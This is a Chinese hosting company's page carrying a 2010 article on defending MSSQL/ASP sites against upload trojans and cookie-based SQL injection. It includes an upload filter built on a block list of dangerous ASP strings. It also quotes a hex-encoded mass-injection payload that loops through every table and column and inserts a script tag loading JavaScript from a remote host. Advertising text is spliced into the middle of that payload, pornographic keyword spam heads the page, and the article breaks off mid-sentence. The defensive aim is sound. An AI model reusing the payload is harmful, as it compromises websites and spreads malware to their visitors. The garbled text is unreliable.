亚洲韩日午夜视频,欧美日韩在线精品一区二区三区,韩国超清无码一区二区三区,亚洲国产成人影院播放,久草新在线,在线看片AV色

您好,歡迎來(lái)到思海網(wǎng)絡(luò),我們將竭誠(chéng)為您提供優(yōu)質(zhì)的服務(wù)! 誠(chéng)征網(wǎng)絡(luò)推廣 | 網(wǎng)站備案 | 幫助中心 | 軟件下載 | 購(gòu)買(mǎi)流程 | 付款方式 | 聯(lián)系我們 [ 會(huì)員登錄/注冊(cè) ]
促銷(xiāo)推廣
客服中心
業(yè)務(wù)咨詢(xún)
有事點(diǎn)擊這里…  531199185
有事點(diǎn)擊這里…  61352289
點(diǎn)擊這里給我發(fā)消息  81721488
有事點(diǎn)擊這里…  376585780
有事點(diǎn)擊這里…  872642803
有事點(diǎn)擊這里…  459248018
有事點(diǎn)擊這里…  61352288
有事點(diǎn)擊這里…  380791050
技術(shù)支持
有事點(diǎn)擊這里…  714236853
有事點(diǎn)擊這里…  719304487
有事點(diǎn)擊這里…  1208894568
有事點(diǎn)擊這里…  61352289
在線(xiàn)客服
有事點(diǎn)擊這里…  531199185
有事點(diǎn)擊這里…  61352288
有事點(diǎn)擊這里…  983054746
有事點(diǎn)擊這里…  893984210
當(dāng)前位置:首頁(yè) >> 技術(shù)文章 >> 文章瀏覽
技術(shù)文章

防范MSSQL數(shù)據(jù)庫(kù)被掛馬方法

添加時(shí)間:2010-12-5  添加: admin 

 第一,網(wǎng)站存在上傳漏洞;雖然,上傳文件需要管理員身份驗(yàn)證,也對(duì)上傳文件進(jìn)行了文件格式的認(rèn)證,但管理員身份驗(yàn)證采用了cookies,而cookies是可以被偽造的,而且如果上傳了圖片后,不對(duì)該文件的內(nèi)容采取任何判斷的話(huà),那么圖片木馬也很有可能被上傳。
     flymorn的解決措施:1 刪除上傳文件功能(不太實(shí)際);2 修改上傳用戶(hù)驗(yàn)證為session驗(yàn)證;3 對(duì)上傳后的文件內(nèi)容進(jìn)行驗(yàn)證,如果是圖片木馬,則刪除;可以參考以下的驗(yàn)證代碼:
''===============判斷上傳文件是否含非法字符串start================
set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filePath), 1) '讀取文本文件
sTextAll = lcase(MyText.ReadAll)
MyText.close
set MyFile = nothing
sStr="<%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
sNoString = split(sStr,"|")
for i=0 to ubound(sNoString)
   if instr(sTextAll,sNoString(i)) then
     set filedel = server.CreateObject("Scripting.FileSystemObject")
     filedel.deletefile Server.mappath(filePath)
     set filedel = nothing
     Response.Write("<script>alert('您上傳的文件有問(wèn)題,上傳失敗!');history.back();</script>")
     Response.End
   end if
next
''=================判斷上傳文件是否含非法字符串end===================

     第二,網(wǎng)站存在cookies注入漏洞。由于程序設(shè)計(jì)中,為了考慮到減小服務(wù)器的開(kāi)銷(xiāo),所有用戶(hù)登陸后采用cookies驗(yàn)證,這個(gè)cookies里保存了用戶(hù)的 ID 和 NAME ,而眾所周知,cookies是經(jīng)常被黑客偽造的,這是其一;另外,某些外部參數(shù) 沒(méi)有采用嚴(yán)格的 request.form 和 request.querystring 來(lái)獲取內(nèi)容,為了簡(jiǎn)便,采用了 request("id") 這樣的方式。
      我們知道,ASP 的request 是先從form、querystring里獲取內(nèi)容,如果這兩個(gè)為空,則要從cookies里獲取內(nèi)容,大家往往在程序設(shè)計(jì)中考慮到了 request.form 和 request.querystring 的SQL注入,所以一般都會(huì)過(guò)濾 request.form 和 request.querystring進(jìn)行sql注入;但卻偏偏忘了過(guò)濾cookies方式下的注入。我們來(lái)看下下面這樣的sql語(yǔ)句:
SQL="select * from 表名 where id="&request("id")
     如果這個(gè) id 恰巧是通過(guò)cookies來(lái)獲取值的,那么想想,這是一件多么可怕的事!注入者可以輕松的偽造一個(gè)名為 id 的虛假 cookies ,因?yàn)檫@個(gè) id 的cookies 是服務(wù)器分配給客戶(hù)端的。這個(gè)cookies可以被偽造成類(lèi)似下面這樣的一段代碼:
dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6
15265207441624c655f637572736f5220635572536f5220466f522073456c456354206 IT人才網(wǎng)(http://it.ad0.cn) 12e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e694www.ad0.cn43d622e6
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--

      看暈了吧。這是利用HEX的方式進(jìn)行SQL注入,可以繞過(guò)一般的IDS驗(yàn)證,只要系統(tǒng)存在SQL注入,上面的代碼將會(huì)被執(zhí)行,通過(guò)游標(biāo)遍歷數(shù)據(jù)庫(kù)中的所有表和列并在列中插入js代碼。
      飄易采取的解決辦法:1 嚴(yán)格過(guò)濾 request.f

分享到:

頂部 】 【 關(guān)閉
版權(quán)所有:佛山思海電腦網(wǎng)絡(luò)有限公司 ©1998-2024 All Rights Reserved.
聯(lián)系電話(huà):(0757)22630313、22633833
中華人民共和國(guó)增值電信業(yè)務(wù)經(jīng)營(yíng)許可證: 粵B1.B2-20030321 備案號(hào):粵B2-20030321-1
網(wǎng)站公安備案編號(hào):44060602000007 交互式欄目專(zhuān)項(xiàng)備案編號(hào):200303DD003  
察察 工商 網(wǎng)安 舉報(bào)有獎(jiǎng)  警警  手機(jī)打開(kāi)網(wǎng)站